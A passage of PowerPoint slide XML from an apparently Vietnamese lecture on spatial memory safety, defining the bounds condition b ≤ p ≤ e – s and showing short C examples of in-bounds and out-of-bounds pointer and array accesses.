            <a:ext cx="1585076" cy="492412"/>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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;564;p70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E14B42-3A19-2FA8-39BD-ED2F7F57A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6213452" y="4114800"/>
            <a:ext cx="2138400" cy="492412"/>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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Destination</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29185525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1D6E-0238-4FA3-9F4F-906ECE8F5351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An toàn truy cập bộ nhớ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8118AEAC-9A39-4CA7-967E-2B376B74E5A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An toàn không gian(Spatial safety): thao tác chỉ nên truy cập vào đúng vùng nhớ đã xác định</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nếu gọi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>b: địa chỉ ô nhớ đầu tiên của vùng nhớ được chỉ ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>p: địa chỉ cần truy cập tới</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e: địa chỉ ô nhớ cuối cùng của vùng nhớ được chỉ ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>s: kích thước vùng nhớ mà con trỏ p truy cập tới</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Thao tác truy cập bộ nhớ chỉ an toàn khi và chỉ khi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>b ≤ p ≤ e – s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lưu ý: Các toán tử tác động trên p không làm thay đổi b và e.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14D6D52-35EC-41C6-B736-89C95C955F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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23718065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5722-2ED3-44C7-A3EF-C0782B9681B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An toàn không gian – Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BE80BE-4036-4FDA-9FC2-3B37F93DD009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4950218"/>
            <a:ext cx="8229600" cy="1526782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lỗi truy cập không an toàn về không gian gây ra các lỗ hổng như đã biết</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A1DF6FF-84BC-48B9-84DF-E16E5823E197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44B041E-ACE8-4CB6-8609-6724B633BE42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1950184"/>
            <a:ext cx="8229600" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> x = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *y = &amp;x;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// b = &amp;x, e = &amp;x + 4, s = 4</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *z = y + 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// b = &amp;x, e = &amp;x + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, s = 4</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*y = 10; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//OK: &amp;x ≤ p = &amp;x ≤ (&amp;x + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) - 4</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*z = 10;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Fail: &amp;x ≤ p = &amp;x + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ≤ (&amp;x + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) - 4</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:latin typeface="Consolas" panose="020B06090202040302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FD2B2D45-8CCC-40B2-85E6-6FE25BE611F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3877270"/>
            <a:ext cx="8229600" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> str[10];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//b = &amp;str, e = &amp;str + 10 </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>str[5] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'A'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//OK: &amp;str </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>≤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> p = &amp;str + 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>≤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (&amp;str + 10) - 1</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>str[10] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'F'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
